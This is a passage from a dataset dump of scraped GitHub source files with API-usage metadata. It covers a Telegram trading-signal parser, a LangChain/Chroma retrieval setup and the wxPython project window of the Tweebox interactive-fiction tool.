"call"}, {"api_name": "engine.functional.terms", "line_number": 984, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 985, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 985, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 986, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 986, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 987, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 987, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", 
"line_number": 989, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 989, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 990, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.IS", "line_number": 990, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 990, "usage_type": "attribute"}, {"api_name": "ast.VariableDeclaration", "line_number": 999, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 1004, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 1012, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewProperty", "line_number": 1022, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1022, "usage_type": "name"}, {"api_name": "ast.ClassDefinition", "line_number": 1025, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1043, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewClass", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1047, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1047, "usage_type": "call"}, {"api_name": "ast.ImportNames", "line_number": 1054, "usage_type": "name"}, {"api_name": "ast.ImportSource", "line_number": 1054, "usage_type": "name"}, {"api_name": "util.check_type", "line_number": 1056, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 1056, "usage_type": "argument"}, {"api_name": "ast.ImportSource", "line_number": 1059, "usage_type": "argument"}, {"api_name": "ast.ImportNames", "line_number": 1067, "usage_type": "argument"}, {"api_name": "engine.functional.reference.AbsoluteFrameReference", "line_number": 1105, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewDict", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.get", "line_number": 1114, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1114, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.NEQ", "line_number": 1117, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", 
"line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.set", "line_number": 1119, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1119, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VProcedure", "line_number": 1124, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1143, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewModule", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1158, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1158, "usage_type": "call"}]} +{"seq_id": "17330651811", "text": "import json\nimport os\nfrom server.sql import sqlScripts\n\n\nclass Analyzer:\n BUY_ACTION = 1\n SELL_ACTION = 0\n STOP_LOSS_KEY = 'stop_loss'\n TAKE_PROFIT_KEY = 'take_profit'\n stop_loss = None\n take_profit_levels = []\n config = {\n \"buy_signals\": [\n \"buy\",\n \"buy now\"\n ],\n \"sell_signals\": [\n \"sell\",\n \"sell now\"\n ],\n \"telegram_user_name\": \"your_telegram_user_name\",\n \"api_id\": \"your_telegram_api_id\",\n \"api_hash\": \"your_telegram_api_hash\"\n }\n\n def __init__(self, text, dbCursor, chat_id, chat_name, serialized_chat_info):\n self.chat_id = chat_id\n self.chat_name = chat_name\n self.serialized_chat_info = serialized_chat_info\n self.dbCursor = dbCursor\n self.text = text.lower()\n self.symbol = self.identifySymbol()\n self.action = self.identifyAction()\n self.action_now = self.identifyActionNow()\n self.identifyStopLossLevel()\n self.identifyAllTakeProfitLevels()\n self.checkForConfigFiles()\n\n def identifyActionNow(self):\n if 'now' in self.text:\n return True\n\n return False\n\n def checkForConfigFiles(self):\n if not os.path.isfile('./config.json'):\n with open('./config.json', 'w') as config_file:\n json.dump(self.config, config_file)\n else:\n with open('./config.json', 'r') as config_file:\n self.config = json.load(config_file)\n\n def identifyAction(self):\n sell_counter = 0\n buy_counter = 0\n for s in self.config['sell_signals']:\n if s in self.text:\n sell_counter += 1\n\n for b in self.config['buy_signals']:\n if b in 
self.text:\n buy_counter += 1\n\n if buy_counter >= 1 and sell_counter == 0:\n return self.BUY_ACTION\n\n if sell_counter >= 1 and buy_counter == 0:\n return self.SELL_ACTION\n\n return None\n\n def identifySymbol(self):\n res = self.dbCursor.execute(sqlScripts.constructGetInstrumentsSql())\n allowedSymbols = res.fetchall()\n\n for symbol in allowedSymbols:\n if symbol[1].lower() in self.text:\n return symbol[2]\n\n return None\n\n def isSignalValid(self):\n if self.action is None or self.symbol is None:\n return False\n\n if self.identifyActionNow():\n return True\n\n if self.stop_loss is None or len(self.take_profit_levels) == 0:\n return False\n\n return True\n\n def identifyAllTakeProfitLevels(self):\n if self.serialized_chat_info['allow_multiple_tp']:\n for i in range(0, len(self.serialized_chat_info['take_profit_key_words']) - 1):\n current_key_word = self.serialized_chat_info['take_profit_key_words'][i]\n self.take_profit_levels.append(self.identifySingleTakeProfitLevel(current_key_word))\n self.take_profit_levels = [i for i in self.take_profit_levels if i is not None]\n else:\n self.take_profit_levels.append(\n self.identifySingleTakeProfitLevel(self.serialized_chat_info['take_profit_key_words'][0])\n )\n\n def identifyStopLossLevel(self):\n index_start = self.text.find(self.serialized_chat_info['stop_loss_key_word'].lower())\n index_end = index_start + len(self.serialized_chat_info['stop_loss_key_word'])\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if self.stop_loss is None:\n self.stop_loss = str(current_char)\n continue\n\n self.stop_loss = self.stop_loss + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n def identifySingleTakeProfitLevel(self, take_profit_key_word):\n if take_profit_key_word.lower() not in self.text:\n return\n\n take_profit_level = None\n\n index_start = self.text.find(take_profit_key_word)\n index_end = index_start + len(take_profit_key_word)\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if take_profit_level is None:\n take_profit_level = str(current_char)\n continue\n\n take_profit_level = take_profit_level + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n return take_profit_level\n\n def printDetails(self):\n print(\"Signal Info:\")\n print(f\"Instrument: {self.action} {self.symbol}\")\n print(f\"Take-profit-levels: {self.take_profit_levels}\")\n print(f\"Stop-loss: {self.stop_loss}\")\n", "repo_name": "NagaiMatsuge/ucharKetmon", "sub_path": "server/utils/analyzer/analyzer.py", "file_name": "analyzer.py", "file_ext": "py", "file_size_in_byte": 5196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts.constructGetInstrumentsSql", "line_number": 74, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "8279342456", "text": "from dotenv import 
load_dotenv\nfrom langchain.chains import RetrievalQA\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.vectorstores import Chroma\nfrom langchain.docstore.document import Document\nfrom langchain.text_splitter import CharacterTextSplitter, TokenTextSplitter, RecursiveCharacterTextSplitter\nfrom server.oobabooga_llm import OobaboogaLLM\nfrom langchain.llms import OpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom constants import *\nimport os\n\nload_dotenv()\nTEST_FILE = os.getenv(\"TEST_FILE\")\nEMB_INSTRUCTOR_XL = os.getenv(\"EMBEDDINGS_MODEL\")\n\nCHROMA_SETTINGS = {} # Set your Chroma settings here\ndef load_tools(llm_model):\n \n def ingest_file(file_path):\n # Load text file\n with open(file_path, 'r') as file:\n text = file.read()\n\n # Use filename as title\n title = os.path.basename(file_path)\n docs = {title: text}\n embedding = HuggingFaceInstructEmbeddings(model_name=EMB_INSTRUCTOR_XL, model_kwargs={\"device\": \"cuda:2\"})\n \n documents = [Document(page_content=docs[title]) for title in docs]\n # Split by section, then split by token limit\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=100, chunk_overlap=20)\n texts = text_splitter.split_documents(documents)\n \n text_splitter = TokenTextSplitter(chunk_size=512,chunk_overlap=10, encoding_name=\"cl100k_base\") # may be inexact\n texts = text_splitter.split_documents(texts)\n \n vectordb = Chroma.from_documents(documents=texts, embedding=embedding)\n retriever = vectordb.as_retriever(search_kwargs={\"k\":4})\n\n print(title)\n print(retriever)\n \n return retriever, title\n\n file_path = TEST_FILE\n retriever, title = ingest_file(file_path)\n\n def searchChroma(key_word):\n hf_llm = OobaboogaLLM() \n qa = RetrievalQA.from_chain_type(llm=hf_llm, chain_type=\"stuff\",\\\n retriever=retriever, return_source_documents=False)\n \n print(qa)\n res=qa.run(key_word)\n print(res)\n return res\n\n dict_tools = {\n 'Chroma Search': searchChroma,\n 'File Ingestion': ingest_file,\n }\n return dict_tools\n\n\n", "repo_name": "Karajan421/langchain_guidance", "sub_path": "server/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 2381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "langchain.embeddings.HuggingFaceInstructEmbeddings", "line_number": 31, "usage_type": "call"}, {"api_name": "langchain.docstore.document.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "langchain.text_splitter.RecursiveCharacterTextSplitter", "line_number": 35, "usage_type": "call"}, {"api_name": "langchain.text_splitter.TokenTextSplitter", "line_number": 38, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma.from_documents", "line_number": 41, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma", "line_number": 41, "usage_type": "name"}, {"api_name": "server.oobabooga_llm.OobaboogaLLM", "line_number": 53, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA.from_chain_type", 
"line_number": 54, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "17283598333", "text": "#\n# gui.py\n#\n# This handles the project window and menus.\n#\n\nimport os, sys, wx, urllib\nfrom project import Project\nimport tiddlywiki\n\nID_HELP = 101\nID_GOOGLE_GROUP = 102\n\nID_NEW_PROJECT = 103\nID_OPEN_PROJECT = 104\nID_SAVE_PROJECT = 105\nID_SAVE_PROJECT_AS = 106\n\nID_ADD_SOURCE = 107\nID_REMOVE_SOURCE = 108\nID_BUILD = 109\nID_PROOF = 110\n\nID_TARGET_CHOICE = 201\nID_SAVEAS_BUTTON = 202\nID_BUILD_BUTTON = 203\nID_ADD_BUTTON = 204\n\n\nclass ProjectWindow (wx.Frame):\n\n\t#\n\t# constructors\n\t#\n\n\tdef __init__ (self, parent):\n\t\n\t\t# restore our config and recently-opened files\n\t\t\n\t\tself.config = wx.Config('Tweebox')\n\t\tself.recentFiles = wx.FileHistory(5)\n\t\tself.recentFiles.Load(self.config)\n\t\n\t\t# get a new Project object\n\t\t\n\t\tself.project = Project()\n\t\tself.fileName = ''\n\t\tself.dirty = False\n\n\t\t# create the window\n\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, 'Untitled Project', \\\n\t\t\t\t\t\t size = (550, 250), style = wx.CLOSE_BOX | wx.CAPTION | wx.SYSTEM_MENU | wx.MINIMIZE_BOX)\n\t\tself.addMenus()\t\t\n\t\tself.addControls()\n\t\tself.CreateStatusBar()\n\t\t\t\t\n\t\t# show our window\n\t\n\t\tself.Centre()\n\t\tself.Show(True)\n\t\t\n\t\t# try opening the most recent project\n\t\t\n\t\tif self.recentFiles.GetCount() > 0:\n\t\t\tself.fileName = self.recentFiles.GetHistoryFile(0)\n\t\t\tself.loadFile(failLoudly = False)\n\t\t\t\n\t\t\n\tdef addMenus (self):\n\t\n\t\t# create menus\n\n\t\thelpMenu = wx.Menu()\n\t\thelpMenu.Append(wx.ID_ABOUT, '&About Tweebox')\n\t\thelpMenu.Append(ID_HELP, 'Tweebox &Help')\n\t\thelpMenu.Append(ID_GOOGLE_GROUP, 'Discuss Twee Online')\n\t\t\n\t\tfileMenu = wx.Menu()\n\t\tself.fileNewItem = fileMenu.Append(ID_NEW_PROJECT, '&New Project\\tCtrl-N')\n\t\tself.fileOpenItem = fileMenu.Append(ID_OPEN_PROJECT, '&Open Project...\\tCtrl-O')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileSaveItem = fileMenu.Append(ID_SAVE_PROJECT, '&Save Project\\tCtrl-S')\n\t\tself.fileSaveAsItem = fileMenu.Append(ID_SAVE_PROJECT_AS, 'S&ave Project As...')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileQuitItem = fileMenu.Append(wx.ID_EXIT, '&Exit\\tCtrl-Q')\n\t\tself.recentFiles.UseMenu(fileMenu)\n\t\tself.recentFiles.AddFilesToMenu()\n\n\t\tprojectMenu = wx.Menu()\n\t\tself.projectAddItem = projectMenu.Append(ID_ADD_SOURCE, 'Add Source File...')\n\t\tself.projectRemoveItem = projectMenu.Append(ID_REMOVE_SOURCE, 'Remove Source File')\n\t\tprojectMenu.AppendSeparator()\n\t\tself.projectBuildItem = projectMenu.Append(ID_BUILD, '&Build Story\\tCtrl-B')\n\t\tself.projectProofItem = projectMenu.Append(ID_PROOF, '&Proof Story\\tCtrl-P')\n\t\t\n\t\t# create menu bar\n\t\t\n\t\tmenuBar = wx.MenuBar()\n\t\tmenuBar.Append(fileMenu, '&File')\n\t\tmenuBar.Append(projectMenu, '&Project')\n\t\tmenuBar.Append(helpMenu, '&Help')\n\t\tself.SetMenuBar(menuBar)\t\t\n\n\t\t# add menu events\n\t\t\n\t\twx.EVT_UPDATE_UI(self, -1, self.updateUI)\n\t\t\n\t\twx.EVT_MENU(self, wx.ID_ABOUT, self.onAbout)\n\t\twx.EVT_MENU(self, ID_HELP, self.onHelp)\n\t\twx.EVT_MENU(self, ID_GOOGLE_GROUP, self.onGoogleGroup)\n\t\twx.EVT_MENU(self, ID_NEW_PROJECT, self.onNew)\n\t\twx.EVT_MENU(self, ID_OPEN_PROJECT, self.onOpen)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT, self.onSave)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT_AS, self.onSaveAs)\n\t\twx.EVT_MENU(self, wx.ID_EXIT, 
self.onQuit)\n\t\twx.EVT_MENU(self, wx.ID_FILE1, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE2, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE3, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE4, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE5, self.onOpenRecent)\n\t\twx.EVT_MENU(self, ID_ADD_SOURCE, self.onAddSource)\n\t\twx.EVT_MENU(self, ID_REMOVE_SOURCE, self.onRemoveSource)\n\t\twx.EVT_MENU(self, ID_BUILD, self.onBuild)\n\t\twx.EVT_MENU(self, ID_PROOF, self.onProof)\n\n\n\tdef addControls (self):\n\t\tpanel = wx.Panel(self)\n\t\tmainSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tpanel.SetSizer(mainSizer)\n\t\t\n\t\t# sources on the left half\n\t\t\n\t\tsourcesPanel = wx.Panel(panel)\n\t\tsourcesBox = wx.StaticBox(sourcesPanel, wx.ID_ANY, 'Source Files')\n\t\tsourcesSizer = wx.StaticBoxSizer(sourcesBox, wx.VERTICAL)\n\t\tsourcesPanel.SetSizer(sourcesSizer)\n\t\t\n\t\tself.sourcesList = wx.ListBox(sourcesPanel)\n\t\tself.addButton = wx.Button(sourcesPanel, ID_ADD_BUTTON, 'Add')\n\t\twx.EVT_BUTTON(self, ID_ADD_BUTTON, self.onAddSource)\n\t\t\n\t\tsourcesSizer.Add(self.sourcesList, 1, wx.EXPAND)\n\t\tsourcesSizer.Add(self.addButton, 0, wx.TOP | wx.ALIGN_RIGHT, 8)\n\t\t\n\t\t# story file stuff on the right half\n\t\t\n\t\tstoryPanel = wx.Panel(panel)\n\t\tstoryBox = wx.StaticBox(storyPanel, wx.ID_ANY, 'Story File')\n\t\tstorySizer = wx.StaticBoxSizer(storyBox, wx.VERTICAL)\n\t\tstoryPanel.SetSizer(storySizer)\n\t\t\n\t\t# file destination row\n\t\t\n\t\tsaveAsPanel = wx.Panel(storyPanel)\n\t\tsaveAsSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsaveAsPanel.SetSizer(saveAsSizer)\n\t\t\n\t\tself.saveAsText = wx.StaticText(saveAsPanel, wx.ID_ANY, 'Save As:')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.saveAsButton = wx.Button(saveAsPanel, ID_SAVEAS_BUTTON, 'Set')\t\t\t\t\t\t\t\t \n\t\twx.EVT_BUTTON(self, ID_SAVEAS_BUTTON, self.onSetDestination)\n\t\t\n\t\tsaveAsSizer.Add(self.saveAsText, 1, wx.TOP | wx.BOTTOM | wx.EXPAND, 10)\n\t\tsaveAsSizer.Add(self.saveAsButton, 0, wx.TOP | wx.BOTTOM, 8)\n\n\t\tstorySizer.Add(saveAsPanel, 0, wx.EXPAND, 0)\n\t\t\n\t\t# target row\n\n\t\ttargetPanel = wx.Panel(storyPanel)\n\t\ttargetSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\ttargetPanel.SetSizer(targetSizer)\n\t\t\n\t\tself.targetLabel = wx.StaticText(targetPanel, wx.ID_ANY, 'Story Format:')\n\n\t\tself.targetChoice = wx.Choice(targetPanel, ID_TARGET_CHOICE, \\\n\t\t\t\t\t\t\t\t\t choices = ('Sugarcane', 'Jonah', 'TiddlyWiki 2', 'TiddlyWiki 1.2'))\n\t\tself.targetChoice.SetSelection(0)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twx.EVT_CHOICE(self, ID_TARGET_CHOICE, self.onChangeTarget)\n\t\t\n\t\ttargetSizer.Add(self.targetLabel, 1, wx.TOP | wx.BOTTOM, 10)\n\t\ttargetSizer.Add(self.targetChoice, 1, wx.TOP | wx.BOTTOM, 8)\n\t\t\n\t\tstorySizer.Add(targetPanel, 0, wx.ALL | wx.EXPAND, 0)\n\t\t\n\t\t# add our halves to the main panel\n\t\t\n\t\tmainSizer.Add(sourcesPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\tmainSizer.Add(storyPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\t\t\t\n\t#\n\t# utility functions\n\t#\n\n\tdef updateUI (self, event):\t\t\n\t\tif self.sourcesList.GetSelection() == wx.NOT_FOUND:\n\t\t\tself.projectRemoveItem.Enable(False)\n\t\telse:\n\t\t\tself.projectRemoveItem.Enable(True)\n\t\t\t\n\t\tif self.sourcesList.IsEmpty():\n\t\t\tself.projectBuildItem.Enable(False)\n\t\t\tself.projectProofItem.Enable(False)\n\t\telse:\n\t\t\tself.projectBuildItem.Enable(True)\n\t\t\tself.projectProofItem.Enable(True)\n\t\t\t\n\t\t\t\n\tdef updateTitle (self):\n\t\tif self.fileName == 
'':\n\t\t\ttitle = 'Untitled Project'\n\t\telse:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\t\t\t\n\t\tself.SetTitle('Tweebox - ' + title)\n\t\t\n\t\n\tdef updateDestination (self):\n\t\tlabel = 'Save As: '\n\t\t\n\t\tif self.project.destination != '':\n\t\t\tlabel += os.path.basename(self.project.destination)\n\t\t\n\t\tself.saveAsText.SetLabel(label)\n\t\t\n\t\t\n\tdef closeProject (self):\n\t\tif self.dirty:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\n\t\t\tmessage = 'Close ' + title + ' without saving changes?'\n\t\t\tdialog = wx.MessageDialog(self, message, 'Save Changes', \\\n\t\t\t\t\t\t\t\t\t wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT)\n\t\t\treturn (dialog.ShowModal() == wx.ID_YES)\n\t\telse:\n\t\t\treturn True\n\t\t\t\n\n\tdef targetToReadable (self, target):\n\t\tif target == 'sugarcane':\n\t\t\treturn 'Sugarcane'\n\t\t\n\t\tif target == 'jonah':\n\t\t\treturn 'Jonah'\n\t\t\t\n\t\tif target == 'tw2':\n\t\t\treturn 'TiddlyWiki 2'\n\t\t\t\n\t\tif target == 'tw':\n\t\t\treturn 'TiddlyWiki 1.2'\n\t\t\n\t\n\tdef readableToTarget (self, readable):\n\t\tif readable == 'Sugarcane':\n\t\t\treturn 'sugarcane'\n\t\t\n\t\tif readable == 'Jonah':\n\t\t\treturn 'jonah'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 2':\n\t\t\treturn 'tw2'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 1.2':\n\t\t\treturn 'tw'\n\t\t\t\n\t#\n\t# event handlers\n\t#\n\n\tdef onAbout (self, event):\n\t\tinfo = wx.AboutDialogInfo()\n\t\tinfo.SetName('Tweebox')\n\t\tinfo.SetVersion('2.1')\n\t\tinfo.SetDescription('\\nA tool for creating interactive stories\\nwritten by Chris Klimas\\n\\nhttp://gimcrackd.com/etc/src/')\n\t\tinfo.SetCopyright('The Twee compiler and associated JavaScript files in this application are released under the GNU Public License.\\n\\nThe files in the targets directory are derivative works of Jeremy Ruston\\'s TiddlyWiki project and are used under the terms of its license.')\n\t\twx.AboutBox(info)\n\n\t\t\n\tdef onHelp (self, event):\n\t\twx.LaunchDefaultBrowser('http://gimcrackd.com/etc/doc/')\n\n\t\t\n\tdef onGoogleGroup (self, event):\n\t\twx.LaunchDefaultBrowser('http://groups.google.com/group/tweecode')\n\n\n\tdef onNew (self, event):\n\t\tif (self.closeProject()):\n\t\t\tself.project = Project()\n\t\t\tself.fileName = ''\n\t\t\tself.dirty = True\n\t\t\tself.updateTitle()\n\t\t\tself.updateDestination()\n\t\t\tself.sourcesList.Clear()\n\t\t\t\n\t\t\t\n\tdef onOpen (self, event):\n\t\tif (self.closeProject()):\n\t\t\tdialog = wx.FileDialog(self, 'Open Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t\t\t\t\t\t\t wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\t\t\t\t\t\t\t\t\t\t\t \t \n\t\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\t\tself.fileName = dialog.GetPath()\n\t\t\t\tself.loadFile()\n\t\t\t\tself.recentFiles.AddFileToHistory(self.fileName)\n\t\t\t\t\n\t\t\tdialog.Destroy()\n\t\t\t\t\n\tdef onOpenRecent (self, event):\t\t\n\t\tif event.GetId() == wx.ID_FILE1:\n\t\t index = 0\n\t\telif event.GetId() == wx.ID_FILE2:\n\t\t index = 1\n\t\telif event.GetId() == wx.ID_FILE3:\n\t\t index = 2\n\t\telif event.getId() == wx.ID_FILE4:\n\t\t index = 3\n\t\telif event.getId() == wx.ID_FILE5:\n\t\t index = 4\n\t\t\t \n\t\tself.fileName = self.recentFiles.GetHistoryFile(index)\n\t\tself.loadFile()\n\n\tdef loadFile (self, failLoudly = True):\n\t\ttry:\n\t\t\tself.project = Project(self.fileName)\n\t\texcept:\n\t\t\tif failLoudly:\n\t\t\t\twx.MessageBox('Can\\'t open ' + self.fileName + 
'. Make sure this file has not been moved ' + \\\n\t\t\t\t \t\t 'or deleted, and that you are able to read files in this location.', \\\n\t\t\t\t\t\t\t 'Can\\'t Open File', wx.ICON_ERROR)\n\t\t\treturn\n\t\t\t\t\n\t\tself.dirty = False\n\t\t\n\t\t# sync UI to file contents\n\t\t\t\t\t\t\n\t\tself.updateTitle()\n\t\tself.updateDestination()\n\t\tself.sourcesList.Clear()\n\t\t\n\t\tfor source in self.project.sources:\n\t\t\tself.sourcesList.Append(os.path.basename(source))\n\t\t\n\t\ttarget = self.targetToReadable(self.project.target)\n\t\tself.targetChoice.SetStringSelection(target)\t\t\n\n\n\tdef displayError (self, activity):\n\t\texception = sys.exc_info()\n\t\ttext = 'An error occurred while ' + activity + ' ('\n\t\ttext += str(exception[1]) + ').'\n\t\t\n\t\terror = wx.MessageDialog(self, text, 'Error', wx.OK | wx.ICON_ERROR)\n\t\terror.ShowModal()\n\t\t\n\n\tdef onSaveAs (self, event):\n\t\tdialog = wx.FileDialog(self, 'Save Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t \t\t\t\t\t wx.SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tself.fileName = dialog.GetPath()\n\t\t\tself.updateTitle()\n\t\t\tself.onSave(event)\n\t\t\t\n\t\tdialog.Destroy()\n\t\t\t\n\n\tdef onSave (self, event):\n\t\tif self.fileName != '':\n\t\t\ttry:\n\t\t\t\tself.project.save(self.fileName)\n\t\t\t\tself.dirty = False\n\t\t\texcept:\n\t\t\t\tself.displayError('saving your project')\n\t\telse:\n\t\t\tself.onSaveAs(event)\n\n\n\tdef onQuit (self, event):\n\t\tif self.closeProject():\n\t\t\tself.recentFiles.Save(self.config)\n\t\t\tself.Close(True)\n\t\t\n\n\tdef onAddSource (self, event):\n\t\tdialog = wx.FileDialog(self, 'Add Source File', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t \"Twee source code (*.tw)|*.tw|Plain text files (*.txt)|*.txt\", wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\n\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\tpath = dialog.GetPath()\n\t\t\tself.project.sources.append(path)\n\t\t\tself.sourcesList.Append(os.path.basename(path))\n\t\t\tself.dirty = True\n\t\t\t\n\t\tdialog.Destroy()\n\n\n\tdef onRemoveSource (self, event):\n\t\tindex = self.sourcesList.GetSelection()\n\t\tself.project.sources.pop(index)\n\t\tself.sourcesList.Delete(index)\n\t\tself.dirty = True\n\t\t\n\t\t\n\tdef onChangeTarget (self, event):\n\t\ttarget = self.targetChoice.GetStringSelection()\n\t\tself.project.target = 